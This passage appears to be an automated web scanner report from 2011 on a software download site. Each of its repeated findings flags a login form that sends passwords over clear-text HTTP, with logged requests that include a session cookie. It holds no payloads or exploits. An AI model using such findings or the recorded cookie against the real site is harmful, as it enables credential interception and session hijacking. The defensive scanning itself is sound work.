<td><input name="password" type="password" /></td>
...[SNIP]...

6.200. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.201. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.202. http://www.x64bitdownload.com/64-bit-search-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.203. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.204. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.205. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.206. http://www.x64bitdownload.com/64-bit-topic-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.207. http://www.x64bitdownload.com/64-bit-troll-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.208. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.209. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.210. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.211. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.212. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.213. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.214. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.215. http://www.x64bitdownload.com/64-bit-video-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.216. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.217. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
